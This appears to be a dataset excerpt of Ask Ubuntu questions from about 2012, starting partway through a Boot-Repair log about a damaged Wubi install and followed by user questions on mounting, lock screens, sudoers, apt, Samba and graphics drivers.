haswinload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /media/f65048ab50487501 . sda4 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-kernel , is-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , recovery-or-hidden , bootmgr , is-winboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /mnt/boot-sav/sda4 . sda5 : sda , not-sepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /media/lenovo . sda : not-gpt , biosboot-not-needed , has-no-efipart , not-usb , has-os , 2048 sectors * 512 bytes =================== parted -l : model : ata st320lt020-9yg14 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 211mb 210mb primary ntfs boot 2 211mb 273gb 273gb primary ntfs 3 273gb 304gb 31.1gb extended lba 5 273gb 304gb 31.1gb logical ntfs 4 304gb 320gb 15.8gb primary ntfs diag model : ( scsi ) disk /dev/sdb : 2013mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1847kb 2013mb 2011mb primary fat16 boot =================== parted -lm : byt ; /dev/sda:320gb : scsi:512:4096 : msdos : ata st320lt020-9yg14 ; 1:1049kb:211mb:210mb : ntfs : :boot ; 2:211mb:273gb:273gb : ntfs : : ; 3:273gb:304gb:31.1gb : : : lba ; 5:273gb:304gb:31.1gb : ntfs : : ; 4:304gb:320gb:15.8gb : ntfs : :diag ; byt ; /dev/sdb:2013mb : scsi:512:512 : msdos : ; 1:1847kb:2013mb:2011mb : fat16 : :boot ; =================== mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sdb1 on /cdrom type vfat ( ro , noatime , fmask=0022 , dmask=0022 , codepage=cp437 , i ocharset=iso8859-1 , shortname=mixed , errors=remount-ro ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu ) /dev/sda1 on /media/c0c646d2c646c87c type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , b lksize=4096 ) /dev/sda2 on /media/f65048ab50487501 type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , b lksize=4096 ) /dev/sda5 on /media/lenovo type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , b lksize=4096 ) /dev/sda4 on /mnt/boot-sav/sda4 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda2 sda3 sda4 sda5 size slaves stat subsystem trace uevent /sys/block/sdb ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sdb1 size slaves stat subsystem trace uevent /sys/block/sdc ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : agpgart autofs block bsg btrfs-control bus cdrom cdrw char console core cpu cpu_dma_latency disk dri dvd dvdrw ecryptfs fb0 fd full fuse hidraw0 hpet input kmsg log mapper mcelog mei mem net network_latency network_throughput null oldmem port ppp psaux ptmx pts random rfkill rtc rtc0 rts51x0 sda sda1 sda2 sda3 sda4 sda5 sdb sdb1 sdc sg0 sg1 sg2 sg3 shm snapshot snd sr0 stderr stdin stdout uinput urandom usbmon0 usbmon1 usbmon2 v4l vga_arbiter video0 zero ls /dev/mapper : control =================== df -th : filesystem type size used avail use % mounted on /cow overlayfs 1.9g 108m 1.8g 6 % / udev devtmpfs 1.9g 12k 1.9g 1 % /dev tmpfs tmpfs 774m 868k 773m 1 % /run /dev/sdb1 vfat 1.9g 1.6g 315m 84 % /cdrom /dev/loop0 squashfs 660m 660m 0 100 % /rofs tmpfs tmpfs 1.9g 48k 1.9g 1 % /tmp none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 1.9g 176k 1.9g 1 % /run/shm /dev/sda1 fuseblk 200m 29m 172m 15 % /media/c0c646d2c646c87c /dev/sda2 fuseblk 255g 37g 218g 15 % /media/f65048ab50487501 /dev/sda5 fuseblk 29g 9.8g 20g 34 % /media/lenovo /dev/sda4 fuseblk 15g 8.5g 6.3g 58 % /mnt/boot-sav/sda4 =================== fdisk -l : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x1a0aba4b device boot start end blocks id system /dev/sda1 * 2048 411647 204800 7 hpfs/ntfs/exfat /dev/sda2 411648 533389311 266488832 7 hpfs/ntfs/exfat /dev/sda3 533389312 594198527 30404608 f w95 ext 'd ( lba ) /dev/sda4 594198528 625142447 15471960 12 compaq diagnostics /dev/sda5 533391360 594198527 30403584 7 hpfs/ntfs/exfat disk /dev/sdb : 2013 mb , 2013265920 bytes 16 heads , 15 sectors/track , 16384 cylinders , total 3932160 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 3608 3932159 1964276 6 fat16 =================== recommended repair recommended-repair this setting will restore the [ ( generic mbr ) ] mbr in sda , and make it boot on sda1 . additional repair will be performed : unhide-bootmenu-10s repair-wubi fix-windows-boot quantity of real windows : 1 mount -o loop /media/f65048ab50487501/ubuntu/disks/root.disk /mnt/boot-sav/wubi1 mount : /dev/loop1 : ca n't read superblock the file browser that just opened will let you access your wubi ( linux installed into windows ) files . ( /mnt/boot-sav/wubi1/home ) please backup your data now ! then close this window . xdg-open : file '/mnt/boot-sav/wubi1/home ' does not exist umount /mnt/boot-sav/wubi1 umount : /mnt/boot-sav/wubi1 : not mounted fsck -f -y /media/f65048ab50487501/ubuntu/disks/root.disk fsck from util-linux 2.20.1 e2fsck 1.42 ( 29-nov-2011 ) fsck.ext2 : attempt to read block from filesystem resulted in short read while trying to open /media/f65048ab50487501/ubuntu/disks/root.disk could this be a zero-length partition ? will restore the mbr_to_restore : sda ( generic mbr ) into sda dd if=/usr/lib/syslinux/mbr.bin of=/dev/sda 0+1 records in 0+1 records out boot successfully repaired . you can now reboot your computer . pastebinit packages needed w : duplicate sources.list entry cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04.1 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20120823.1 ) _dists_precise_ma in_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120823.1 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04.1 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20120823.1 ) _dists_precise_re stricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems dpkg-preconfigure : unable to re-open stdin : no such file or directory thanks for your reply . i did n't see anything that looked to be the right file size . here is the output from that found folder : ( sorry , not sure if this is formatting the directory output correctly ) c : \found.000 > dir 11/08/2012 07:09 am dir0000.chk 10/13/2012 05:17 am 1,048,576 file0002.chk 1 file ( s ) 1,048,576 bytes 1 dir ( s ) 236,435,017,728 bytes free c : \found.000 > cd dir0000.chk c : \found.000\dir0000.chk > dir 11/08/2012 07:09 am . 11/08/2012 07:09 am .. 10/13/2012 05:17 am 240 ciad0001.000 10/13/2012 05:17 am 0 ciad0001.002 2 file ( s ) 240 bytes 2 dir ( s ) 236,435,005,440 bytes free should i try moving these into root.disk or any other locations to search ? if this file ca n't be found , is there another way to recover data ?
216246	ubuntu nexus 7 as usb device does not work	i connected usb cable from nexus 7 running ubuntu to my ubuntu laptop but there is no new usb device found when i run lsusb . is this function supported ?
216250	screen will not lock automatically 12.10	since upgrading to 12.10 i can not get my screen to lock automatically . i am using gdm at home and lightdm at work and neither will lock automatically . however , when i issue ctrl + alt + l on either system , the screen will lock as it should . it is set to turn the display off after 5 minutes and lock screen when screen turns off . require password is set also . display turns off after 5 minutes but no locking occurs . i am using unity with compiz on both systems . not sure what other things might be involved .
216255	how disable mysql command in sudoers file ?	how can i disable /usr/bin/mysql command in sudoers file ? i 've tried to use it this way : % tailonly all= ! /usr/bin/mysql but when i access user 'tailonly ' of group 'tailonly ' , this command is still enabled . in short , i only want that 'tailonly ' user access tail -f /usr/app/*.log . this is possible ? edit : with this config , the user 'tailonly ' still can access mysql terminal with 'mysql ' command : $ : sudo su $ : visudo cmnd_alias mysql = /usr/bin/mysql cmnd_alias tail=/usr/bin/tail -f /jacad/jacad3/logs/*.log # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all % swa all=/etc/init.d/jacad3 stop % swa all=/etc/init.d/jacad3 start % swa all=/etc/init.d/jacad3 restart % swa all=sudoedit /jacad/jacad3/bin/jacad_start.sh % tailonly all=all , ! mysql
216259	backup no longer working	since upgrading to ubuntu 12.10 backups no longer work ( using the default deja-dup backup tool ) . i always get the message : no space left in â/â . ( which is not the path i backup to ) . the preferences are set to back up my home ignoring trash . and the destination has ~500gb of space free ! is there some way to get to the cause of this strange error ? ( which internally fails , because not being able to allocate space in /tmp . ) edit : added more details .
216265	installing ubuntu 10.04 in vmware player on ubuntu 12.10	i have ubuntu 12.10 and vmware player installed on my system . i am trying to install ubuntu 10.04 inside the vmware player . but it gets stuck at the following screen and the gui doesnt load . what is the problem ? ps : if this is helpful , the following warning is displayed
216270	can not automount any usb external device under quantal	i recently upgrade to quantal and i have to mount all my devices ( usb key , extrernal hard drive and even data cd ) manually . i get the following error message in a pop-up window when i insert any eternal media : adding read acl for uid 1322 to `/media/iovleff ' failed : operation not supported by the way , my user name is `` iovleff '' and my uid is 1322 . can you help me in some way ?
216272	wireless keyboard & mouse for 12.4 desktop ?	can anyone suggest a good wireless keyboard and mouse to use with 12.4 ? thanks !
216273	problems updating system with apt-get	after trying apt-get update and apt-get upgrade i have the following error message : this is a coppy of my terminal ( in spanish ) root @ linuxjgp : /home/javiergp # apt-get upgrade leyendo lista de paquetes ... hecho creando árbol de dependencias leyendo la información de estado ... hecho se actualizarán los siguientes paquetes : apport apport-symptoms fonts-liberation gnome-icon-theme gnome-orca language-pack-en language-pack-en-base language-pack-es language-pack-es-base language-pack-gnome-en language-pack-gnome-en-base language-pack-gnome-es language-pack-gnome-es-base light-themes linux-firmware oneconf resolvconf sessioninstaller software-center ssl-cert tzdata ubuntu-docs ubuntu-keyring ubuntu-sso-client ubuntuone-control-panel ubuntuone-installer unity-lens-video unity-scope-video-remote xdiagnose 29 actualizados , 0 se instalarán , 0 para eliminar y 0 no actualizados . e : los archivos de índice de paquetes están dañados . no existe un campo «filename : » para el paquete ubuntu-keyring . how can resolve this problem ?
216277	ca n't mount usb flash drives or my cd/dvd drives	how can i fix the permissions to get rid of the following error and mount my usb and internal cd/dvd drive : adding read acl for uid 1000 to `/media/bret ' failed : operation not supported these drives worked fine in 12.04 , but i apparently now do n't have permissions to mount these drives in 12.10 . i tried chmod in the terminal , but i could n't enter as the superuser , so i seem to be stuck . please help !
216280	desktop environment menu missing on 12.10	i am using ubuntu 12.10 and when i go to the login screen it does n't have the desktop environment menu . there is no button for the menu which is really annoying because i want to change environment .
216286	difference between additional drivers ( nvidia )	which driver should i choose ? here is what they offer me . i 've heard that nvidia has released new drivers few days ago and i do n't know which they are . i tried installing them with .run file but i ca n't .
216287	unable to install files with apt-get : `` unable to locate package ''	i 'm having issues with my ubuntu server version 12.04 installed on a hp550 laptop , when i try sudo apt-get install < programname > , e.g apache2 it will not work , saying e : unable to locate package apache2 . i have tried to look/edit the sources . but they will not work either the gedit command is broken too , i am trying gedit /etc/apt/sources.list for those wondering , is this a case of the computer network not configured properly ? it downloaded a language pack easily enough in the installation though . how do i fix this ? a prompt reply would be appreciated .
216288	windows ' time gets reset when using wubi installer ?	i am new to the linux world and i wanted to try ubuntu - so i installed it using wubi . everything is working fine till now , but i noticed an strange issue : everytime i boot ubuntu and later use windows the system time gets set to 11:54 of the current day . please could anyone tell me whats the issue ?
216292	is juju deploy data accessible on the instances ?	when you launch an instance and explicitly name it using : juju deploy lamp website1 is there a way on the newly created instance to get the data that tells the machine that its : called website1 or even better : a unit number such as website1/0 , website1/1 etc etc the reason for doing this is that in my charm i wish to set the hostname to this value . i did wonder if it was set via ec2metadata but it does n't seem to list this information .
216299	finding out if ubuntu supports a specific laptop ?	according to how to install hardware drivers for my laptop , the answer supplied by norticus says : '' if your hardware as open drivers for ubuntu , they will be install with ubuntu . if there is driver from hp , you can find them into your setting- > additional drivers . this is jockey , and it will let you know which drivers are available for your hardware . just select which one you want and click install . '' but what if you do not already own the system , and you want to find out before you buy ?
216302	gnome-classic lock screen no password prompt	i have ubuntu 12.04 , on a dell inspiron 14r , intel hd 3000 . i set on the power settings , `` when the lid is closed : do nothing . '' the password prompt worked just fine when i closed and opened the lid . but now after i have updated the intel graphics driver , most of the times , when i open the laptop lid , there 's no password prompt . i 've tried typing the password blindly , but it does not respond to keyboard or mouse input . the only way out of it , is to use tty1 , log and restart lightdm with the following command : sudo service lightdm restart but the problem is , it closes all my previous opened programs .
216303	ubuntu 12.10 - graphics driver shows gallium 0.4 instead of intel hd	i have a hybrid intel/nvidia system using bumblebee on ubuntu 12.10 with specs : clevo w150hr , sb i7-2720qm , 8gb ram , 128gb crucial m4 ssd + 500gb hdd it is reported to use software rendering ( through gallium driver ) rather than accelerated through the intel hd driver . reinstalling the intel driver has no effect : sudo apt-get install -- reinstall xserver-xorg-video-intel the result is a rather sluggish desktop . is there any way to blacklist the gallium driver ? or force the intel driver instead ? edit 1 - ubuntu 12.04 shows the driver as intel sandybridge out of the box , but 12.10 does not even after running the above command . edit 2 - xorg.0.log shows : ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) sandybridge mobile ( gt1 ) ( ww ) intel ( 0 ) : disabling hardware acceleration on this pre-production hardware . edit 3 - it turns out that sandybridge rev.7 systems are known to be unstable per this link . accordingly in the xserver-xorg-video-intel if it detects this rev . it disables it with the warning in above log .
216309	nm-applet disconnects from a known wireless network and fails to reconnect	i have samsung r780 laptop with realtek rtl8192e wireless lan 802.11n pci-e nic . i had problems with wireless on it from the beginning : initially , internal wireless adapter would not even work ( see launchpad bug # 574105 i had filed ) . then , after some upgrades , it started to work upon loading the system , but then failed to be recognized by the system after suspend . now , after 12.04 and 12.10 upgrades it works both upon launch and resume from suspend , and works generally good , although it slows down sometimes . but every now and again ( could be several times a day ) it disconnects from the network , then tries to reconnect for some time , then pops a window requesting a password , even though it has the correct password saved . after that , it fails to reconnect , and just keeps asking for the password . it works again after restart ( which is a hassle if i had a lot of work to be done ) , or sometimes ( not often ) can be fixed by disabling wireless and networking ( in various combinations ) , and then re-enabling them again . if i killall nm-applet , and then restart network-manager and nm-applet via the terminal , it prints the following to the console when it happens : ** message : no keyring secrets found for [ network id ] /802-11-wireless-security ; asking user . ( nm-applet : [ process id ] ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed now , i am aware of various issues with different flavours of realtek adapters , about using built-in linux drivers v. installing proprietary ones via ndiswrapper , about testing upstream kernels and so forth ( and all the related questions on askubuntu ) . what i am asking specifically is what exactly that glib error message entails . i had seen similar issue on all sorts of systems , and relating to all sorts of packages , from nm-applet , to audacity , and others . given better understanding of that , i could better pinpoint the problem or file ( or find , which i had failed so far ) proper launchpad bug for it , methinks .
216310	bluetooth mouse disconnects but only when on battery	i use a lenovo thinkpad bluetooth laser mouse with my thinkpad x130e and quantal . it works without problems as long as the notebook is on ac-power . when it runs on battery the mouse works for some minutes or half an hour an suddenly it stops working and i must reboot to get it work again . what is different with the bluetooth connection when running on battery and can it be changed ? i guess it must have something to do with power saving functions . thanks for your help . ps : i just found /usr/lib/pm-utils/power.d/usb_bluetooth.sh . this looks as if there could be the solution for the problem but i 'm not good at reading such scripts .
216318	how to make onboard go away ?	because i had a problem with my keyboard i enabled the on screen keyboard onboard . now , i want to disable it , but i have n't been able to do so , even though i have googled for a solution . right now , the onboard screen does n't appear on the lock screen , it just gets loaded on login and boot up and i want to disable that . i have hidden the keyboard and the tray icon too , but i can still see it running with the ps command . nuno @ mozart : ~ $ ps -e | grep onboard 4138 ? 00:00:01 onboard i have also tried the onboard command at the terminal , but that does n't give me any `` do n't run on boot up option '' . and i have also checked the start up appliications `` startup applications '' and it was n't there . any idea how i can disable it for sure ? thanks .
216319	ssh filesystem ( sshfs ) with indirect access	say i have ssh access to machine `` foo '' : me @ local : ssh user1 @ foo and from there i can access `` bar '' : user1 @ foo : ssh user2 @ bar with this setup , is there any way i can use sshfs to mount in my local machine a directory located in `` bar '' ? i do n't have administrative access in `` foo '' , so i ca n't use sshfs to mount a directory there .
216322	how can i capture text from a specific terminal and redirect it to a log file while simultaneously working ?	i viewed this question to redirect text to file while displaying the output . my question is how can i redirect it while working and without constant | tee command . my plan is to use this question to identify terminal ( gnome or guake ) and record only gnome for my linux commands testing . so i need constant and immediate redirecting of commands and their outputs ( with errors ) to a file ( say cmdlog.log ) .
216323	ugly lock screen in xubuntu	when i lock my screen , i do n't get the nice login dialog which is present after my laptop reboot . i get something ugly similar to this : i googled this picture , it is not exact screenshot , but it is almost the same . how can i fix this ? is it standard behaviour or did i break something ? the picture of burning screen scares me , but i repeat myself `` do n't panic ! '' and it kinda helps a little . it is ugly . it does not look like the 99 % of my environment . i use multiple keyboard layouts . when typing password , i need to see which one is active , because otherwise i make typos in my password and have to try login multiple times . with this screen , i usually end up in exactly 3-5 tries , as i make wrong guesses and other accidental typos caused by nervousness . why is it called xscreensaver ? i disabled screensavers . i hate them . i want only to lock my computer while i go to bathroom or for a lunch . i want my login screen .
216326	can i redirect file as input to notify-send ?	i want to use command notify-send and display text from a file as a notification so that i can only edit that file to change command or forward contents from outputs of other programs to notify-send . i tried : notify-send -u critical -t 3000 < ~/ved cat ved | notify-send -u critical -t 3000 it says : no summary specified . what should i do about this summary ?
216329	why is my samba4 [ homes ] share not browsable ?	for some reason , i ca n't see the home directory share that maps to each user 's home directory , [ homes ] . i can directly map the network drive to it in windows or mount it on a mac , but when trying to browse all available shares it does n't show up . i 've tried setting the [ homes ] share to browseable = no and browseable = yes without any success . here is my smb.conf : [ global ] # custom edits via hook # # # # # # # # # # # # # # # # # # # # # # # # enable symlinks outside of shares unix extensions = no wide links = yes browseable = yes # end custom edits # # # # # # # # # # # # # # # # # # # netbios name = enterprise workgroup = life server string = zentyal file server wins support = yes dns proxy = yes name resolve order = wins bcast host interfaces = lo , eth0 bind interfaces only = yes server role = dc server role check : inhibit = yes realm = life.lan log level = 3 log file = /var/log/samba/samba.log passdb backend = samba4 idmap_ldb : use rfc2307 = yes server services = -dns -nbt -wrepl server signing = auto [ netlogon ] path = /var/lib/samba/sysvol/life.lan/scripts browseable = no read only = yes [ sysvol ] path = /var/lib/samba/sysvol read only = no [ homes ] comment = home directories path = /home/ % s read only = no browseable = no create mask = 0611 directory mask = 0711 vfs objects = acl_xattr full_audit full_audit : success = connect opendir disconnect unlink mkdir rmdir open rename full_audit : failure = connect opendir disconnect unlink mkdir rmdir open rename # shares [ directories ] comment = home directories path = /home browseable = yes read only = no force create mode = 0660 force directory mode = 0660 vfs objects = acl_xattr full_audit full_audit : success = connect opendir disconnect unlink mkdir rmdir open rename full_audit : failure = connect opendir disconnect unlink mkdir rmdir open rename # shares [ default ] comment = a share for anything path = /home/samba//shares/default browseable = yes read only = no force create mode = 0660 force directory mode = 0660 vfs objects = acl_xattr full_audit full_audit : success = connect opendir disconnect unlink mkdir rmdir open rename full_audit : failure = connect opendir disconnect unlink mkdir rmdir open rename # shares [ scan ] comment = printer scans path = /home/samba//shares/default/scanned browseable = yes read only = no force create mode = 0660 force directory mode = 0660 vfs objects = acl_xattr full_audit full_audit : success = connect opendir disconnect unlink mkdir rmdir open rename full_audit : failure = connect opendir disconnect unlink mkdir rmdir open rename [ print $ ] comment = `` printer drivers '' path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no write list = @ '' domain admins '' valid users = @ '' domain users '' # [ zentyal-internal-backups ] # path = /tmp # browseable = yes # read only = yes # valid users = @ '' domain admins '' # admin users = @ '' domain admins '' # force group = ebox # force user = ebox [ zentyal-quarantine ] comment = `` quarantine '' path = /home/samba/quarantine browseable = yes read only = no # custom share # generated by hook [ intranet ] comment = intranet path = /var/www/ministries browseable = yes read only = no force create mode = 0660 force directory mode = 0660 vfs objects = acl_xattr full_audit full_audit : success = connect opendir disconnect unlink mkdir rmdir open rename full_audit : failure = connect opendir disconnect unlink mkdir rmdir open rename [ ministries ] comment = ministries path = /var/local/ministries browseable = yes read only = no force create mode = 0660 force directory mode = 0660 vfs objects = acl_xattr full_audit full_audit : success = connect opendir disconnect unlink mkdir rmdir open rename full_audit : failure = connect opendir disconnect unlink mkdir rmdir open rename
216335	some applications ( anki , okular , calibre ) start very slowly	when i start one of the applications mentioned in the title from the terminal , i get this : registered dec : true error in contacting registry '' org.freedesktop.dbus.error.noreply '' '' did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . '' could not query active accessibility event listeners . registered event listener change listener : true currently i am running 12.04 this problem started a couple of days ago , shortly after i 've installed okular from within the software center . by `` slow '' i mean it takes about 30 seconds . other applications like chromium start instantly .
216345	dual boot ubuntu 12.04 and ubuntu 12.10	i 'm running ubuntu 12.04 on my machine with 1 hdd but it 's starting to get very slow . so i decided to buy some new stuff ( mobo , cpu , memory , ssd and 2 hdd ) . now i would like to make it a dual boot with a new install ( 12.10 ) on the ssd and the old installation on my old hdd . in a few months , i will pull out the old hdd and put it in a new box for my kids . but until then it should be able to boot into the old version . what 's the best way to do this ? i have tried something similair a few years back but that gave me a lot problems . each update/upgrade gave problems with the boot loader and i had to change things manually after which it start working again . i 'm trying to prevent that this time . my own thought would be to remove my old drive , put in the ssd , install ubuntu from cd . after the installation is completed , i plug in my old hdd and run update-grub . is that the best way to do it ?
216348	problem with ati radeon hd 7670m on ubuntu 12.10	i updated from ubuntu 12.04 to 12.10 a couple of days back . my machine is a dell inspiron 15r with a radeon hd 7670m graphic driver . when i was using 12.04 , i was able to install the propriety driver using the notification you usually get . but after the upgrade , the graphic driver is not getting installed . i am not getting the notification to install the driver and i also tried to follow the steps given - what is the correct way to install ati catalyst video drivers ( fglrx ) ? i tried the legacy as well as the usual installation procedure both ways i failed and my graphics went to the fallback , disabling unity note : my laptop is getting heated to 80 degrees and can shut down at any point . please help .
216349	razer naga & ubuntu 12.10	are there any configurators with profiles for the razer naga mouse ? i 've found this link , but i do n't know how to install it .
216351	software compliance	i am new to this and all linux distributions . after installing ubuntu 12.04 and getting all the updates , i then ran a software scan on this machine . it came up with over 250 applications . are all of these âfreeâ in terms of license use ? are all distributions of linux licensed for free to use ? if i want to run a software security audit on my linux machines , do i need to bother or is there a legal document stating that all apps and software on this linux machine is legal to use ? just trying to understand this whole linux world that i am slowing coming into . any info would help . thanks
216354	sudo aptitude full-upgrade = 420 conflicts	i think the following will explain my concern for not wanting to choose y. oshirowanen @ desktop : ~ $ sudo aptitude full-upgrade the following new packages will be installed : libavcodec53 { a } libavutil51 { a } the following packages will be upgraded : libavdevice53 libavformat53 libpostproc52 libproxy1 libproxy1 : i386 libproxy1-plugin-gsettings libproxy1-plugin-networkmanager libswscale2 python-libproxy 9 packages upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 3,804 kb of archives . after unpacking 7,233 kb will be used . the following packages have unmet dependencies : libavutil-extra-51 : conflicts : libavutil51 but 4:0.8.4-0ubuntu0.12.04.1 is to be installed . libavcodec-extra-53 : conflicts : libavcodec53 but 4:0.8.4-0ubuntu0.12.04.1 is to be installed . open : 418 ; closed : 3160 ; defer : 214 ; conflict : 420 othe following actions will resolve these dependencies : remove the following packages : 1 ) bluez-alsa : i386 2 ) frei0r-plugins 3 ) glib-networking : i386 4 ) google-earth-stable 5 ) gstreamer0.10-ffmpeg 6 ) gstreamer0.10-plugins-bad-multiverse 7 ) gstreamer0.10-plugins-base : i386 8 ) gstreamer0.10-plugins-good : i386 9 ) gstreamer0.10-x : i386 10 ) gtk2-engines : i386 11 ) gtk2-engines-murrine : i386 ( and many more only deleted due to limited characters allowed in question ) 247 ) melt 248 ) odbcinst1debian2 : i386 249 ) openshot 250 ) python-mlt3 251 ) vlc 252 ) vlc-nox 253 ) vlc-plugin-notify 254 ) vlc-plugin-pulse 255 ) xaw3dg : i386 256 ) zlib1g : i386 keep the following packages at their current version : 257 ) libavcodec53 [ not installed ] 258 ) libavutil51 [ not installed ] leave the following dependencies unresolved : 259 ) ubuntu-restricted-addons recommends gstreamer0.10-ffmpeg 260 ) ubuntu-restricted-extras recommends gstreamer0.10-plugins-bad-multiverse 261 ) libcanberra-gtk0 : i386 recommends libcanberra-gtk-module : i386 262 ) libncurses5 : i386 recommends libgpm2 : i386 263 ) libncursesw5 : i386 recommends libgpm2 : i386 264 ) libslang2 : i386 recommends libpng12-0 : i386 265 ) libvisual-0.4-0 : i386 recommends libvisual-0.4-plugins : i386 266 ) libgphoto2-2 : i386 recommends udev : i386 ( > = 0.175 ) 267 ) libgphoto2-2 : i386 recommends libgphoto2-l10n : i386 ( > = 2.4.13-1ubuntu1.2 ) 268 ) libqt4-dbus : i386 recommends qdbus : i386 ( = 4:4.8.1-0ubuntu4.3 ) 269 ) libqt4-sql : i386 recommends libqt4-sql-mysql : i386 | libqt4-sql-odbc : i386 | libqt4-sql-psql : i386 | libqt4-sql-sqlite : i386 accept this solution ? [ y/n/q/ ? ] any idea how to correct this ?
216363	switching sound to different monitor	i 'm running ubuntu 12.04 . i have an lcd monitor that has built-in speakers which i use as my default monitor . i also have an lcd tv which i use as a second monitor sometimes to watch shows from the couch . both are hooked up to my graphics card via hdmi cables . i can get the displays to go into twinview via nvidia x server settings , but i ca n't figure out how to get the audio to switch from the monitor speakers to the tv speakers . there is no audio section in the nvidia settings , and the sound section in system settings can only see my default monitor apparently .
216367	steam : error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass64	after nvidia driver installation when i try to run steam i am getting this error : steam : error while loading shared libraries : libgl.so.1 : wrong elf class : elfclass64 i found this question and one of the answers that suggest installing : sudo apt-get install libgl1-mesa-glx : i386 i have already installed libgl1-mesa-glx : i386 . than i found this . it suggests making a symlink to 32bit libgl . how can do that ? do you have any other suggestions ?
216368	libreoffice base menu disappears	i just installed libreoffice base on my 64 bit ubuntu 12.10 machine . it worked great at first , but the menu at the top of the screen will no longer appear at the top . it was working at first . the menu i am talking about is the strip that contains the file , edit , and other menus . i restarted my computer , but it did n't work . i reinstalled base , but that did n't work . other libreoffice products and other programs such as calc or gedit display the menus normally .
216370	vlc media player sound problems in 12.10	when i try playing .m4v files in vlc the sound track does n't play correctly , and i get a kind of buzzing staticy distorted version of the actual sound , i 'd really appreciate some help as i do n't really like totem and xbmc does n't seem to be working either . thanks in advance !
216371	apt-get dist-upgrade does n't fix 'the following packages have been kept back '	i 'm on ubuntu 12.04.running sudo apt-get dist-upgrade is not upgrading some packages . i ca n't upgrade them with graphical update manager too . sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages have been kept back : libavdevice53 libavformat53 libpostproc52 libswscale2 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . lsb version : core-2.0-ia32 : core-2.0-noarch : core-3.0-ia32 : core-3.0-noarch : core-3.1-ia32 : core-3.1-noarch : core-3.2-ia32 : core-3.2-noarch : core-4.0-ia32 : core-4.0-noarch distributor id : ubuntu description : ubuntu 12.04.1 lts release : 12.04 codename : precise
216376	do i need to install network manager for ubuntu desktop 12.04 64 liveusb	i have alcatel speedtouch adls usb modem and i have been trying to figure out how to set it up . i finally found a page explaining it simply . but the network manager program link does n't work . i think i saw this program already installed on ubuntu ? http : //ubuntuforums.org/showthread.php ? t=797804 ( from year 2008 ) and i would like to ask how to install .deb files ? ( as far i learned i will try to copy them in a folder in my flashdisk and then i will run terminal in ubuntu and then i will write this code for every file . ) cd /home/ctest/downloads/ dpkg -i random_name.deb
